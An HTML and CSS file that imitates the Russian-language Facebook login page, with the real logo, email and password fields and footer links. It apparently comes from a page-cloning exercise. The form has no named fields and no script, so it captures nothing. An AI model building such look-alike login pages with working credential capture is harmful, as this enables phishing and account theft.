<!DOCTYPE html>
<html>
<head>
    <title>Facebook</title>
    <style>
        body {
            background-color: rgb(237, 239, 245);
            font-family: 'Open Sans', sans-serif;
        }

        .logo {
            width: 320px;
            height: 250px;
            margin: 95px 0 0 210px;
        }

        #p {
            font-size: 28px;
            margin-left: 240px;
            margin-top: -83px;
            font-family: 'Open Sans', sans-serif;
        }

        .form {
            width: 380px;
            height:328px;
            padding: 10px;
            border-radius: 10px;
            background-color: #fff;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            border-bottom-color: rgb(221, 223, 226);
            font-weight: 400;
            text-align: center;
            font-size:12px;
            position: absolute;
            left: 825px;
            top: 135px;
            
        }

        .input-box {
            width: 370px;
            height:50px;
            padding:20px;
            font-size: 17px;
            font-weight: 370;
            border-radius: 6px;
            border: 1px solid #ddd;
            margin-bottom: 10px;
            box-sizing: border-box;
            line-height:22px;
            color: #1d2129;
            font-family: Helvetica, Arial, sans-serif;
            vertical-align: middle;
            margin:6px;
            
           
        }
        .input-box:focus {
            border-color: #0866ff;
            box-shadow: 0 0 0 2px #e7f3ff;
            caret-color: #0866ff;
            outline: none; 
        }
        #vhod {
            background-color: #0866ff;
            border: none;
            border-radius: 6px;
            font-size: 20px;
            line-height: 48px;
            width: 370px;
            height:50px;
            color: white;
            font-weight: bold;
            cursor: pointer;
            margin:7px;
        }

        #forgot-password {
            display: block;
            color: #0866ff;
            font-size: 14px;
            text-decoration: none;
            margin: 10px 0;
        }

        .divider {
            height: 1px;
            background-color: #ddd;
            margin: 20px 0;
        }

        #create-account {
            background-color: #42b72a;
            border: none;
            border-radius: 6px;
            font-size: 17px;
     
            line-height: 48px;
            width: 230px;
            height:50px;
            color: white;
            font-weight: 600;
            cursor: pointer;
            margin:7px;
        }
        .zname {
            margin: 140px 0 0 580px;
            font-size: 14px;
            text-align:center;
        }
        .footer {
            position: fixed;  
            bottom: 0;        
            left: 0;
            width: 100%;
            height: 95px;      
            background-color: rgb(245, 245, 245); 
            padding: 10px 0; 
            box-shadow: 0 -2px 5px rgba(0, 0, 0, 0.1); 
            z-index: 1000;    
        }
        .languages a {
            color: #606770;   
            text-decoration: none; 
            margin: 0 8px;
            position: relative;
            left:228px;
            font-size: 15px;
            text-align: center;
            
        }

        .languages a:hover {
            text-decoration: underline; 
           
        }

        .more-languages {
            background: none;
            border: none;
            color: #606770;
            font-size: 14px;
            cursor: pointer;
           
        }
        .footer-links {
            margin-top: 10px;
            position: relative;
            left:225px;
            
        }

        .footer-links a {
            color: #606770;
            text-decoration: none;
            font-size: 14px;
            margin: 0 10px;
            
           
        }

        .footer-links a:hover {
            text-decoration: underline;
        }
       

    </style>
</head>
<body>

    <img class="logo" src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="Facebook">
    <p id="p">Facebook помогает вам всегда<br> оставаться на связи и общаться со<br> своими знакомыми.</p>

    <div class="form">
        <form action="login" method="post">
            <input class="input-box" type="email" placeholder="Электронный адрес или номер телефона" required>
            <input class="input-box" type="password" placeholder="Пароль" required>
            <button id="vhod" type="submit">Вход</button>
            <a id="forgot-password" href="#">Забыли пароль?</a>
            <div class="divider"></div>
            <button id="create-account" type="button">Создать новый аккаунт</button>
        </form>
    </div>
    <p class="zname"><b>Создать Страницу </b>знаменитости, музыкальной группы<br> или компании.</p>
    <div class="footer">
        <div class="languages">
            <a href="#">Русский</a>
            <a href="#">Қазақша</a>
            <a href="#">English (US)</a>
            <a href="#">Türkçe</a>
            <a href="#">Bahasa Indonesia</a>
            <a href="#">中文(简体)</a>
            <a href="#">Deutsch</a>
            <a href="#">한국어</a>
            <a href="#">Shqip</a>
            <a href="#">Español</a>
            <a href="#">Português (Brasil)</a>
            <hr style="border: 0.1px solid #b2b2b2; width: 68%; margin: 8px auto;">

            
        </div>
        <div class="footer-links">
            <a href="#">Зарегистрироваться</a>
            <a href="#">Вход</a>
            <a href="#">Messenger</a>
            <a href="#">Faceebook Live</a>
            <a href="#">Видео</a>
            <a href="#">Места</a>
            <a href="#">MarketPlace</a>
            <a href="#">Meta Pay</a>
            <a href="#">Meta shop</a>
            <a href="#">Instagram</a>
            <a href="#">Meta Quest</a><br>
            <a href="#">Условия использования</a>
            <a href="#">Конфиденциальность</a>
            <a href="#">Реклама</a><br>
            <a href="#">Meta © 2025</a>
        </div>
    </div>

    </div>
</body>
</html>